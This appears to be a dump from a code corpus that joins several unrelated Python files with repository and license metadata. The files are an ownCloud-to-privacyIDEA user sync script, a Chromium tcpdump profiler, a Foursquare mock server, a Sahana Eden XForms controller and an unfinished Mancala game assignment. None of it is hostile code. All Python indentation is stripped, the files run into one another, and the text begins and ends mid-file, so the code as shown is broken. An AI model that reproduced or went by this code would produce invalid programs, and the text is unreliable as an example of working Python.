# Read tables oc_accounts and oc_users from owncloud
#
from __future__ import print_function
__doc__ = """You can use this script to read the tables oc_accounts and
oc_users from owncloud and fill a local user table in privacyIDEA.
Run this script in a cron job. It will read the users from ownCloud and
* insert new users
* update changed users
* remove deleted users
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import select
from sqlalchemy.schema import ForeignKey
from sqlalchemy import (Table, MetaData, Column, Integer, Unicode, Boolean,
UnicodeText)
import sys
import json
import getopt
import binascii
import os
import re
EXAMPLE_CONFIG_FILE = """{
"SQL": {
"OWNCLOUD_URI": "mysql+pymysql://oc:password@localhost/oc",
"PRIVACYIDEA_URI": "mysql+pymysql://pi:password@localhost/pi?charset=utf8mb4",
"LOCAL_TABLE": "pi_oc_users",
"INSERT_CHUNK_SIZE": 10000
}
}"""
class Config(object):
def __init__(self, config_file):
with open(config_file, "r") as f:
contents = f.read()
config = json.loads(contents)
self.OWNCLOUD_URI = config.get("SQL").get("OWNCLOUD_URI")
self.PRIVACYIDEA_URI = config.get("SQL").get("PRIVACYIDEA_URI")
self.LOCAL_TABLE = config.get("SQL").get("LOCAL_TABLE")
self.INSERT_CHUNK_SIZE = config.get("SQL").get("INSERT_CHUNK_SIZE")
def sync_owncloud(config_obj):
metadata = MetaData()
user_table = Table(config_obj.LOCAL_TABLE, metadata,
Column("id", Integer, primary_key=True, nullable=False),
Column("email", Unicode(255), nullable=True),
Column("user_id", Unicode(255), nullable=False, unique=True),
Column("lower_user_id", Unicode(255), nullable=False, unique=True),
Column("display_name", Unicode(255)),
Column("backend", Unicode(64)),
Column("last_login", Integer, default=0),
Column("state", Integer, default=0),
Column("password", Unicode(255), nullable=False)
)
oc_accounts_table = Table("oc_accounts", metadata,
Column("id", Integer, primary_key=True, nullable=False),
Column("email", Unicode(255), nullable=True),
Column("user_id", Unicode(255), nullable=False, unique=True),
Column("lower_user_id", Unicode(255), nullable=False, unique=True),
Column("display_name", Unicode(255)),
Column("backend", Unicode(64)),
Column("last_login", Integer, default=0),
Column("state", Integer, default=0)
)
oc_users_table = Table("oc_users", metadata,
Column("uid", Unicode(255), ForeignKey("oc_accounts.user_id")),
Column("password", Unicode(255), nullable=False)
)
oc_engine = create_engine(config_obj.OWNCLOUD_URI)
privacyidea_engine = create_engine(config_obj.PRIVACYIDEA_URI)
print("Creating table {0!s}, if it does not exist.".format(config_obj.LOCAL_TABLE))
metadata.create_all(privacyidea_engine)
conn_oc = oc_engine.connect()
conn_pi = privacyidea_engine.connect()
def insert_chunks(conn, table, values, chunk_size=100000):
"""
Split **values** into chunks of size **chunk_size** and insert them sequentially.
"""
values_length = len(values)
for chunk in range(0, values_length, chunk_size):
print('Insert records {} to {} ...'.format(chunk, min(chunk + chunk_size,
values_length) - 1))
try:
conn.execute(table.insert(), values[chunk:chunk + chunk_size])
except Exception as err:
t = 'Failed to insert chunk: {0!s}'.format(err)
warnings.append(t)
print(t)
warnings = []
s = select([oc_accounts_table, oc_users_table.c.password]).select_from(
oc_accounts_table.join(oc_users_table, oc_users_table.c.uid == oc_accounts_table.c.user_id))
owncloud_source = conn_oc.execute(s)
s = select([user_table])
privacyidea_dest = conn_pi.execute(s)
# Build a dict with the existing users
pi_users = {}
for r in privacyidea_dest:
pi_users[r.id] = r
pi_users_insert = []
pi_users_update = []
unchanged = 0
for r in owncloud_source:
if r.id not in pi_users.keys():
# This is a new entry
pi_users_insert.append(dict(id=r.id, email=r.email, user_id=r.user_id,
lower_user_id=r.lower_user_id, display_name=r.display_name, password=r.password,
backend=r.backend, last_login=r.last_login, state=r.state))
else:
# This is an existing entry
# Check if the entry is the same
if r == pi_users[r.id]:
# The values are the same
print("Entry {0!s}/{1!s} unchanged.".format(r.id, r.user_id))
unchanged += 1
else:
# add to update
pi_users_update.append(dict(id=r.id, email=r.email, user_id=r.user_id,
lower_user_id=r.lower_user_id, display_name=r.display_name, password=r.password,
backend=r.backend, last_login=r.last_login, state=r.state))
# Delete entry from the privacyIDEA user list
del(pi_users[r.id])
pi_users_delete = pi_users
print("Processing...")
print("{0!s} new entries.".format(len(pi_users_insert)))
print("{0!s} unchanged entries.".format(unchanged))
print("{0!s} updated entries.".format(len(pi_users_update)))
print("{0!s} removed entries.".format(len(pi_users_delete)))
if len(pi_users_insert):
print("Inserting new entries.")
insert_chunks(conn_pi, user_table, pi_users_insert, config_obj.INSERT_CHUNK_SIZE)
if len(pi_users_update):
print("Updating entries.")
for upd in pi_users_update:
stmt = user_table.update().where(user_table.c.id == upd.get("id")).values(upd)
conn_pi.execute(stmt)
if len(pi_users_delete):
print("Deleting removed entries.")
for udel in pi_users_delete:
stmt = user_table.delete().where(user_table.c.id == udel)
conn_pi.execute(stmt)
if warnings:
print("We need to inform you about the following WARNINGS:")
for warning in warnings:
print(warning)
def usage():
print("""
privacyidea-sync-owncloud.py --generate-example-config [--config <config file>]
--generate-example-config, -g Output an example config file.
This is a JSON file, that needs to be passed
to this command.
--config, -c <file> The config file, that contains the complete
configuration.
{0!s}""".format(__doc__))
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "gc:", ["generate-example-config", "config="])
except getopt.GetoptError as e:
print(str(e))
sys.exit(1)
config_file = None
generate_config = False
for o, a in opts:
if o in ("-g", "--generate-example-config"):
generate_config = True
print(EXAMPLE_CONFIG_FILE)
elif o in ("-c", "--config"):
config_file = a
else:
print(u"Unknown parameter: {0!s}".format(o))
sys.exit(3)
if config_file:
config_obj = Config(config_file)
sync_owncloud(config_obj)
sys.exit(0)
else:
if not generate_config:
usage()
sys.exit(1)
if __name__ == '__main__':
main()
| agpl-3.0 |
geekboxzone/lollipop_external_chromium_org | tools/telemetry/telemetry/core/platform/profiler/tcpdump_profiler.py | 48 | 4160 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import signal
import subprocess
import sys
import tempfile
from telemetry.core.platform import profiler
from telemetry.core.platform.profiler import android_prebuilt_profiler_helper
_TCP_DUMP_BASE_OPTS = ['-i', 'any', '-p', '-s', '0', '-w']
class _TCPDumpProfilerAndroid(object):
"""An internal class to collect TCP dumps on android.
This profiler uses pre-built binaries from AOSP.
See more details in prebuilt/android/README.txt.
"""
_DEVICE_DUMP_FILE = '/sdcard/tcpdump_profiles/capture.pcap'
def __init__(self, adb, output_path):
self._adb = adb
self._output_path = output_path
self._adb.RunShellCommand('mkdir -p ' +
os.path.dirname(self._DEVICE_DUMP_FILE))
self._proc = subprocess.Popen(
['adb', '-s', self._adb.device_serial(),
'shell', android_prebuilt_profiler_helper.GetDevicePath('tcpdump')] +
_TCP_DUMP_BASE_OPTS +
[self._DEVICE_DUMP_FILE])
def CollectProfile(self):
tcpdump_pid = self._adb.ExtractPid('tcpdump')
if not tcpdump_pid or not tcpdump_pid[0]:
raise Exception('Unable to find TCPDump. Check your device is rooted '
'and tcpdump is installed at ' +
android_prebuilt_profiler_helper.GetDevicePath('tcpdump'))
self._adb.RunShellCommand('kill -term ' + tcpdump_pid[0])
self._proc.terminate()
host_dump = os.path.join(self._output_path,
os.path.basename(self._DEVICE_DUMP_FILE))
self._adb.device().old_interface.Adb().Pull(self._DEVICE_DUMP_FILE,
host_dump)
print 'TCP dump available at: %s ' % host_dump
print 'Use Wireshark to open it.'
return host_dump
class _TCPDumpProfilerLinux(object):
"""An internal class to collect TCP dumps on linux desktop."""
_DUMP_FILE = 'capture.pcap'
def __init__(self, output_path):
if not os.path.exists(output_path):
os.makedirs(output_path)
self._dump_file = os.path.join(output_path, self._DUMP_FILE)
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
try:
self._proc = subprocess.Popen(
['tcpdump'] + _TCP_DUMP_BASE_OPTS + [self._dump_file],
stdout=self._tmp_output_file, stderr=subprocess.STDOUT)
except OSError as e:
raise Exception('Unable to execute TCPDump, please check your '
'installation. ' + str(e))
def CollectProfile(self):
self._proc.send_signal(signal.SIGINT)
exit_code = self._proc.wait()
try:
if exit_code:
raise Exception(
'tcpdump failed with exit code %d. Output:\n%s' %
(exit_code, self._GetStdOut()))
finally:
self._tmp_output_file.close()
print 'TCP dump available at: ', self._dump_file
print 'Use Wireshark to open it.'
return self._dump_file
def _GetStdOut(self):
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
class TCPDumpProfiler(profiler.Profiler):
"""A Factory to instantiate the platform-specific profiler."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(TCPDumpProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
if platform_backend.GetOSName() == 'android':
android_prebuilt_profiler_helper.InstallOnDevice(
browser_backend.adb.device(), 'tcpdump')
self._platform_profiler = _TCPDumpProfilerAndroid(
browser_backend.adb, output_path)
else:
self._platform_profiler = _TCPDumpProfilerLinux(output_path)
@classmethod
def name(cls):
return 'tcpdump'
@classmethod
def is_supported(cls, browser_type):
if browser_type.startswith('cros'):
return False
if sys.platform.startswith('linux'):
return True
return browser_type.startswith('android')
def CollectProfile(self):
return self._platform_profiler.CollectProfile()
| bsd-3-clause |
hunanlike/foursquared | mock_server/playfoursquare.py | 134 | 2253 | #!/usr/bin/python2.6
#
# Simple http server to emulate api.playfoursquare.com
import logging
import shutil
import sys
import urlparse
import SimpleHTTPServer
import BaseHTTPServer
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handle playfoursquare.com requests, for testing."""
def do_GET(self):
logging.warn('do_GET: %s, %s', self.command, self.path)
url = urlparse.urlparse(self.path)
logging.warn('do_GET: %s', url)
query = urlparse.parse_qs(url.query)
query_keys = [pair[0] for pair in query]
response = self.handle_url(url)
if response != None:
self.send_200()
shutil.copyfileobj(response, self.wfile)
self.wfile.close()
do_POST = do_GET
def handle_url(self, url):
path = None
if url.path == '/v1/venue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/addvenue':
path = '../captures/api/v1/venue.xml'
elif url.path == '/v1/venues':
path = '../captures/api/v1/venues.xml'
elif url.path == '/v1/user':
path = '../captures/api/v1/user.xml'
elif url.path == '/v1/checkcity':
path = '../captures/api/v1/checkcity.xml'
elif url.path == '/v1/checkins':
path = '../captures/api/v1/checkins.xml'
elif url.path == '/v1/cities':
path = '../captures/api/v1/cities.xml'
elif url.path == '/v1/switchcity':
path = '../captures/api/v1/switchcity.xml'
elif url.path == '/v1/tips':
path = '../captures/api/v1/tips.xml'
elif url.path == '/v1/checkin':
path = '../captures/api/v1/checkin.xml'
elif url.path == '/history/12345.rss':
path = '../captures/api/v1/feed.xml'
if path is None:
self.send_error(404)
else:
logging.warn('Using: %s' % path)
return open(path)
def send_200(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
def main():
if len(sys.argv) > 1:
port = int(sys.argv[1])
else:
port = 8080
server_address = ('0.0.0.0', port)
httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler)
sa = httpd.socket.getsockname()
print "Serving HTTP on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
if __name__ == '__main__':
main()
| apache-2.0 |
sahildua2305/eden | controllers/xforms.py | 8 | 14374 | # -*- coding: utf-8 -*-
"""
XForms - Controllers
"""
module = request.controller
# -----------------------------------------------------------------------------
def create():
"""
Given a Table, returns an XForms to create an instance:
http://code.javarosa.org/wiki/buildxforms
http://www.w3schools.com/xforms/
http://oreilly.com/catalog/9780596003692/preview.html
Known field requirements that don't work properly:
IS_IN_DB
IS_NOT_ONE_OF
IS_EMAIL
IS_DATE_IN_RANGE
IS_DATETIME_IN_RANGE
"""
try:
tablename = request.args[0]
except:
session.error = T("Need to specify a table!")
redirect(URL(r=request))
title = tablename
table = s3db[tablename]
instance_list = []
bindings_list = []
controllers_list = []
itext_list = [TAG["text"](TAG["value"](s3.crud_strings[tablename].title_list),
_id="title")]
for fieldname in table.fields:
if fieldname in ["id", "created_on", "modified_on", "uuid", "mci",
"deleted", "created_by", "modified_by", "deleted_fk",
"owned_by_group", "owned_by_user"]:
# These will get added server-side
pass
elif table[fieldname].writable == False:
pass
else:
ref = "/" + title + "/" + fieldname
instance_list.append(generate_instance(table, fieldname))
bindings_list.append(generate_bindings(table, fieldname, ref))
controller, _itext_list = generate_controllers(table, fieldname, ref)
controllers_list.append(controller)
itext_list.extend(_itext_list)
#bindings_list.append(TAG["itext"](TAG["translation"](itext_list, _lang="eng")))
instance = TAG[title](instance_list, _xmlns="")
bindings = bindings_list
controllers = TAG["h:body"](controllers_list)
response.headers["Content-Type"] = "text/xml"
response.view = "xforms.xml"
return dict(title=title, instance=instance, bindings=bindings,
controllers=controllers, itext_list=itext_list)
# -----------------------------------------------------------------------------
def uses_requirement(requirement, field):
"""
Check if a given database field uses the specified requirement
(IS_IN_SET, IS_INT_IN_RANGE, etc)
"""
if hasattr(field.requires, "other") or requirement in str(field.requires):
if hasattr(field.requires, "other"):
if requirement in str(field.requires.other):
return True
elif requirement in str(field.requires):
return True
return False
# -----------------------------------------------------------------------------
def generate_instance(table, fieldname):
"""
Generates XML for the instance of the specified field.
"""
if table[fieldname].default:
instance = TAG[fieldname](table[fieldname].default)
else:
instance = TAG[fieldname]()
return instance
# -----------------------------------------------------------------------------
def generate_bindings(table, fieldname, ref):
"""
Generates the XML for bindings for the specified database field.
"""
field = table[fieldname]
if "IS_NOT_EMPTY" in str(field.requires):
required = "true()"
else:
required = "false()"
if field.type == "string":
_type = "string"
elif field.type == "double":
_type = "decimal"
# Collect doesn't support datetime yet
elif field.type == "date":
_type = "date"
elif field.type == "datetime":
_type = "datetime"
elif field.type == "integer":
_type = "int"
elif field.type == "boolean":
_type = "boolean"
elif field.type == "upload": # For images
_type = "binary"
elif field.type == "text":
_type = "text"
else:
# Unknown type
_type = "string"
if uses_requirement("IS_INT_IN_RANGE", field) \
or uses_requirement("IS_FLOAT_IN_RANGE", field):
if hasattr(field.requires, "other"):
maximum = field.requires.other.maximum
minimum = field.requires.other.minimum
else:
maximum = field.requires.maximum
minimum = field.requires.minimum
if minimum is None:
constraint = "(. < " + str(maximum) + ")"
elif maximum is None:
constraint = "(. > " + str(minimum) + ")"
else:
constraint = "(. > " + str(minimum) + " and . < " + str(maximum) + ")"
binding = TAG["bind"](_nodeset=ref,
_type=_type,
_required=required,
_constraint=constraint)
#elif uses_requirement("IS_DATETIME_IN_RANGE", field):
# pass
#elif uses_requirement("IS_EMAIL", field):
# pass
elif uses_requirement("IS_IN_SET", field):
binding = TAG["bind"](_nodeset=ref, _required=required)
else:
binding = TAG["bind"](_nodeset=ref, _type=_type, _required=required)
return binding
# -----------------------------------------------------------------------------
def generate_controllers(table, fieldname, ref):
"""
Generates the controllers XML for the database table field.
"""
itext_list = [] # Internationalization
controllers_list = []
field = table[fieldname]
itext_list.append(TAG["text"](TAG["value"](field.label),
_id=ref + ":label"))
itext_list.append(TAG["text"](TAG["value"](field.comment),
_id=ref + ":hint"))
if hasattr(field.requires, "option"):
items_list = []
for option in field.requires.theset:
items_list.append(TAG["item"](TAG["label"](option), TAG["value"](option)))
controllers_list.append(TAG["select1"](items_list, _ref=fieldname))
#elif uses_requirement("IS_IN_DB", field):
# ToDo (similar to IS_IN_SET)?
#pass
#elif uses_requirement("IS_NOT_ONE_OF", field):
# ToDo
#pass
elif uses_requirement("IS_IN_SET", field): # Defined below
if hasattr(field.requires, "other"):
insetrequires = field.requires.other
else:
insetrequires = field.requires
theset = insetrequires.theset
items_list = []
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
if theset:
option_num = 0 # for formatting something like "jr:itext('stuff:option0')"
for option in theset:
if field.type == "integer":
option = int(option)
option_ref = ref + ":option" + str(option_num)
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + option_ref + "')"),
TAG["value"](option)))
#itext_list.append(TAG["text"](TAG["value"](field.represent(option)), _id=option_ref))
itext_list.append(TAG["text"](TAG["value"](insetrequires.labels[theset.index(str(option))]),
_id=option_ref))
option_num += 1
if insetrequires.multiple:
controller = TAG["select"](items_list, _ref=ref)
else:
controller = TAG["select1"](items_list, _ref=ref)
elif field.type == "boolean": # Using select1, is there an easier way to do this?
items_list=[]
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
# True option
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + ref + ":option0')"),
TAG["value"](1)))
itext_list.append(TAG["text"](TAG["value"]("True"),
_id=ref + ":option0"))
# False option
items_list.append(TAG["item"](TAG["label"](_ref="jr:itext('" + ref + ":option1')"),
TAG["value"](0)))
itext_list.append(TAG["text"](TAG["value"]("False"),
_id=ref + ":option1"))
controller = TAG["select1"](items_list, _ref=ref)
elif field.type == "upload": # For uploading images
items_list=[]
items_list.append(TAG["label"](_ref="jr:itext('" + ref + ":label')"))
items_list.append(TAG["hint"](_ref="jr:itext('" + ref + ":hint')"))
controller = TAG["upload"](items_list, _ref=ref, _mediatype="image/*")
elif field.writable == False:
controller = TAG["input"](TAG["label"](field.label), _ref=ref,
_readonly="true",
_default=field.default.upper())
else:
# Normal Input field
controller = TAG["input"](TAG["label"](field.label), _ref=ref)
return controller, itext_list
# -----------------------------------------------------------------------------
def csvdata(nodelist):
"""
Returns the data in the given node as a comma separated string
"""
data = ""
for subnode in nodelist:
if (subnode.nodeType == subnode.ELEMENT_NODE):
try:
data = data + "," + subnode.childNodes[0].data
except:
data = data+ ","
return data[1:] + "\n"
# -----------------------------------------------------------------------------
def csvheader(parent, nodelist):
"""
Gives the header for the CSV
"""
header = ""
for subnode in nodelist:
if (subnode.nodeType == subnode.ELEMENT_NODE):
header = header + "," + parent + "." + subnode.tagName
return header[1:] + "\n"
# -----------------------------------------------------------------------------
def importxml(db, xmlinput):
"""
Converts the XML to a CSV compatible with the import_from_csv_file of web2py
@ToDo: rewrite this to go via S3Resource for proper Auth checking, Audit.
"""
import cStringIO
import xml.dom.minidom
try:
doc = xml.dom.minidom.parseString(xmlinput)
except:
raise Exception("XML parse error")
parent = doc.childNodes[0].tagName
csvout = csvheader(parent, doc.childNodes[0].childNodes)
for subnode in doc.childNodes:
csvout = csvout + csvdata(subnode.childNodes)
fh = cStringIO.StringIO()
fh.write(csvout)
fh.seek(0, 0)
db[parent].import_from_csv_file(fh)
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def post():
data = importxml(db, request.body.read())
return data
# -----------------------------------------------------------------------------
def formList():
"""
Generates a list of Xforms based on database tables for ODK Collect
http://code.google.com/p/opendatakit/
"""
# Test statements
#xml = TAG.forms(*[TAG.form(getName("Name"), _url = "http://" + request.env.http_host + URL(c="static", "current.xml"))])
#xml = TAG.forms(*[TAG.form(getName(t), _url = "http://" + request.env.http_host + URL(f="create", args=t)) for t in db.tables()])
# List of a couple simple tables to avoid a giant list of all the tables
#tables = ["pf_missing_report", "pr_presence"]
tables = ["irs_ireport", "rms_req", "cr_shelter", "pr_person", "pr_image"]
xml = TAG.forms()
for tablename in tables:
xml.append(TAG.form(get_name(tablename),
_url = "http://" + request.env.http_host + URL(f="create", args=tablename)))
response.headers["Content-Type"] = "text/xml"
response.view = "xforms.xml"
return xml
# -----------------------------------------------------------------------------
def submission():
"""
Allows for submission of Xforms by ODK Collect
http://code.google.com/p/opendatakit/
"""
# @ToDo: Something better than this crude check
if not auth.s3_logged_in():
auth.permission.fail()
try:
from cStringIO import StringIO # Faster, where available
except:
from StringIO import StringIO
import cgi
from lxml import etree
source = request.post_vars.get("xml_submission_file", None)
if isinstance(source, cgi.FieldStorage):
if source.filename:
xmlinput = source.file
else:
xmlinput = source.value
if isinstance(xmlinput, basestring):
xmlinput = StringIO(xmlinput)
else:
raise HTTP(400, "Invalid Request: Expected an XForm")
tree = etree.parse(xmlinput)
tablename = tree.getroot().tag
resource = s3db.resource(tablename)
stylesheet = os.path.join(request.folder, "static", "formats", "odk",
"import.xsl")
try:
result = resource.import_xml(source=tree, stylesheet=stylesheet)
except IOError, SyntaxError:
raise HTTP(500, "Internal server error")
# Parse response
status = json.loads(result)["statuscode"]
if status == 200:
r = HTTP(201, "Saved") # ODK Collect only accepts 201
r.headers["Location"] = request.env.http_host
raise r
else:
raise HTTP(status, result)
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(2)
def submission_old():
"""
Allows for submission of xforms by ODK Collect
http://code.google.com/p/opendatakit/
"""
response.headers["Content-Type"] = "text/xml"
xml = str(request.post_vars.xml_submission_file.value)
if len(xml) == 0:
raise HTTP(400, "Need some xml!")
importxml(db, xml)
r = HTTP(201, "Saved.")
r.headers["Location"] = request.env.http_host
raise r
# -----------------------------------------------------------------------------
def get_name(tablename):
"""
Generates a pretty(er) name from a database table name.
"""
return tablename[tablename.find("_") + 1:].replace("_", " ").capitalize()
# END =========================================================================
| mit |
WmHHooper/aima-python | submissions/Brock/mygames.py | 1 | 13497 | from collections import namedtuple
from games import (Game)
from queue import PriorityQueue
from copy import deepcopy
# class GameState:
# def __init__(self, to_move, board, label=None, depth=8):
# self.to_move = to_move
# self.board = board
# self.label = label
# self.maxDepth = depth
#
# def __str__(self):
# if self.label == None:
# return super(GameState, self).__str__()
# return self.label
class Board:
def __init__(self, length, a_spots, b_spots, a_pool, b_pool):
self.length = length
self.a_spots = a_spots
self.b_spots = b_spots
self.a_pool = a_pool
self.b_pool = b_pool
class GameState:
def __init__(self, to_move, board, label=None, depth=8):
self.to_move = to_move
self.board = board
self.label = label
self.maxDepth = depth
def __str__(self):
if self.label == None:
return super(GameState, self).__str__()
return self.label
class Mancala(Game):
"""A flagrant copy of TicTacToe, from game.py
It's simplified, so that moves and utility are calculated as needed
Play TicTacToe on an h x v board, with Max (first player) playing 'X'.
A state has the player to move and a board, in the form of
a dict of {(x, y): Player} entries, where Player is 'X' or 'O'."""
def __init__(self):
self.initial = GameState(to_move='A', board={})
self.extraMoveA = False
self.extraMoveB = False
def actions(self, state):
try:
return state.moves
except:
pass
"Legal moves are any pieces available on your side of the board not yet taken."
moves = []
if state.to_move == 'A':
for a in range (0, state.board.length):
if state.board.a_spots[a] > 0:
moves.append(a)
if state.to_move == 'B':
for b in range (0, state.board.length):
if state.board.b_spots[b] > 0:
moves.append(b)
state.moves = moves
return moves
# defines the order of play
def opponent(self, player):
if player == 'A' and self.extraMoveA == False:
return 'B'
if player == 'A' and self.extraMoveA == True:
self.extraMoveA = False
return 'A'
if player == 'B' and self.extraMoveB == False:
return 'A'
if player == 'B' and self.extraMoveB == True:
self.extraMoveB = False
return 'B'
return None
def result(self, state, move):
if move not in self.actions(state):
return state # Illegal move has no effect
board = deepcopy(state.board)
player = state.to_move
if player == 'A':
amount = 0
amount = board.a_spots[move]
board.a_spots[move] = 0
for a in range (move+1, board.length):
if amount != 0:
board.a_spots[a] = board.a_spots[a] + 1
amount = amount - 1
if amount == 1:
self.extraMoveA = True
board.a_pool = board.a_pool + 1
amount = 0
for b in range(0, board.length):
if amount != 0:
board.b_spots[b] = board.b_spots[b] + 1
amount = amount - 1
if player == 'B':
amount = 0
amount = board.b_spots[move]
board.b_spots[move] = 0
for b in range(move+1, board.length):
if amount != 0:
board.b_spots[b] = board.b_spots[b] + 1
amount = amount - 1
if amount == 1:
self.extraMoveB = True
board.b_pool = board.b_pool + 1
amount = 0
for a in range(0, board.length):
if amount != 0:
board.a_spots[a] = board.a_spots[a] + 1
amount = amount - 1
next_mover = self.opponent(player)
return GameState(to_move=next_mover, board=board)
def utility(self, state, player):
"Return the value to player; 1 for win, -1 for loss, 0 otherwise."
try:
return state.utility if player == 'A' else -state.utility
except:
pass
board = state.board
onA = 0
for a in range (0, board.length):
onA += board.a_spots[a]
onB = 0
for b in range(0, board.length):
onB += board.b_spots[b]
util = (board.a_pool+onA) - (board.b_pool+onB)
return util
def terminal_test(self, state):
"A state is terminal if there are no more pieces to move for a player."
if len(self.actions(state)) == 0:
onA = 0
for a in range(0, state.board.length):
onA += state.board.a_spots[a]
onB = 0
for b in range(0, state.board.length):
onB += state.board.b_spots[b]
state.board.a_pool += onA
state.board.b_pool += onB
return True
def display(self, state):
board = state.board
print(' ',end=' ')
for b in range(0, board.length):
print(board.b_spots[(board.length-1)-b],end=' ')
print()
print(board.b_pool,end=' ')
for x in range(0, board.length):
print(' ',end=' ')
print(board.a_pool)
print(' ',end=' ')
for a in range(0, board.length):
print(board.a_spots[a],end=' ')
print()
# class FlagrantCopy(Game):
# """A flagrant copy of TicTacToe, from game.py
# It's simplified, so that moves and utility are calculated as needed
# Play TicTacToe on an h x v board, with Max (first player) playing 'X'.
# A state has the player to move and a board, in the form of
# a dict of {(x, y): Player} entries, where Player is 'X' or 'O'."""
#
# def __init__(self, h=3, v=3, k=3):
# self.h = h
# self.v = v
# self.k = k
# self.initial = GameState(to_move='X', board={})
#
# def actions(self, state):
# try:
# return state.moves
# except:
# pass
# "Legal moves are any square not yet taken."
# moves = []
# for x in range(1, self.h + 1):
# for y in range(1, self.v + 1):
# if (x,y) not in state.board.keys():
# moves.append((x,y))
# state.moves = moves
# return moves
#
# # defines the order of play
# def opponent(self, player):
# if player == 'X':
# return 'O'
# if player == 'O':
# return 'X'
# return None
#
# def result(self, state, move):
# if move not in self.actions(state):
# return state # Illegal move has no effect
# board = state.board.copy()
# player = state.to_move
# board[move] = player
# next_mover = self.opponent(player)
# return GameState(to_move=next_mover, board=board)
#
# def utility(self, state, player):
# "Return the value to player; 1 for win, -1 for loss, 0 otherwise."
# try:
# return state.utility if player == 'X' else -state.utility
# except:
# pass
# board = state.board
# util = self.check_win(board, 'X')
# if util == 0:
# util = -self.check_win(board, 'O')
# state.utility = util
# return util if player == 'X' else -util
#
# # Did I win?
# def check_win(self, board, player):
# # check rows
# for y in range(1, self.v + 1):
# if self.k_in_row(board, (1,y), player, (1,0)):
# return 1
# # check columns
# for x in range(1, self.h + 1):
# if self.k_in_row(board, (x,1), player, (0,1)):
# return 1
# # check \ diagonal
# if self.k_in_row(board, (1,1), player, (1,1)):
# return 1
# # check / diagonal
# if self.k_in_row(board, (3,1), player, (-1,1)):
# return 1
# return 0
#
# # does player have K in a row? return 1 if so, 0 if not
# def k_in_row(self, board, start, player, direction):
# "Return true if there is a line through start on board for player."
# (delta_x, delta_y) = direction
# x, y = start
# n = 0 # n is number of moves in row
# while board.get((x, y)) == player:
# n += 1
# x, y = x + delta_x, y + delta_y
# x, y = start
# while board.get((x, y)) == player:
# n += 1
# x, y = x - delta_x, y - delta_y
# n -= 1 # Because we counted start itself twice
# return n >= self.k
#
# def terminal_test(self, state):
# "A state is terminal if it is won or there are no empty squares."
# return self.utility(state, 'X') != 0 or len(self.actions(state)) == 0
#
# def display(self, state):
# board = state.board
# for x in range(1, self.h + 1):
# for y in range(1, self.v + 1):
# print(board.get((x, y), '.'), end=' ')
# print()
myGame = Mancala()
play = GameState(
to_move = 'A',
board = Board(3,[1,1,1],[1,1,1],0,0),
label = 'play'
)
won = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],4,2),
label = 'won'
)
lost = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],2,4),
label = 'lost'
)
tied = GameState(
to_move = 'A',
board = Board(3,[0,0,0],[0,0,0],3,3),
label = 'tied'
)
winin1 = GameState(
to_move = 'A',
board = Board(3,[0,0,1],[0,0,0],3,2),
label = 'winin1'
)
# won = GameState(
# to_move = 'O',
# board = {(1,1): 'X', (1,2): 'X', (1,3): 'X',
# (2,1): 'O', (2,2): 'O',
# },
# label = 'won'
# )
#
# winin1 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O',
# },
# label = 'winin1'
# )
#
# losein1 = GameState(
# to_move = 'O',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O',
# (3,1): 'X',
# },
# label = 'losein1'
# )
#
# winin3 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'O',
# (2,1): 'X',
# (3,1): 'O',
# },
# label = 'winin3'
# )
#
# losein3 = GameState(
# to_move = 'O',
# board = {(1,1): 'X',
# (2,1): 'X',
# (3,1): 'O', (1,2): 'X', (1,2): 'O',
# },
# label = 'losein3'
# )
#
# winin5 = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'O',
# (2,1): 'X',
# },
# label = 'winin5'
# )
#
# lost = GameState(
# to_move = 'X',
# board = {(1,1): 'X', (1,2): 'X',
# (2,1): 'O', (2,2): 'O', (2,3): 'O',
# (3,1): 'X'
# },
# label = 'lost'
# )
class TemplateState: # one way to define the state of a minimal game.
def __init__(self, player): # add parameters as needed.
self.to_move = player
self.label = str(id(self)) # change this to something easier to read
# add code and self.variables as needed.
def __str__(self): # use this exact signature
return self.label
# class TemplateAction:
# '''
# It is not necessary to define an action.
# Start with actions as simple as a label (e.g., 'Down')
# or a pair of coordinates (e.g., (1,2)).
#
# Don't un-comment this until you already have a working game,
# and want to play smarter.
# '''
# def __lt__(self, other): # use this exact signature
# # return True when self is a better move than other.
# return False
class TemplateGame(Game):
'''
This is a minimal Game definition,
the shortest implementation I could run without errors.
'''
def __init__(self, initial): # add parameters if needed.
self.initial = initial
# add code and self.variables if needed.
def actions(self, state): # use this exact signature.
acts = []
# append all moves, which are legal in this state,
# to the list of acts.
return acts
def result(self, state, move): # use this exact signature.
newState = deepcopy(state)
# use the move to modify the newState
return newState
def terminal_test(self, state): # use this exact signature.
# return True only when the state of the game is over.
return True
def utility(self, state, player): # use this exact signature.
''' return:
>0 if the player is winning,
<0 if the player is losing,
0 if the state is a tie.
'''
return 0
def display(self, state): # use this exact signature.
# pretty-print the game state, using ASCII art,
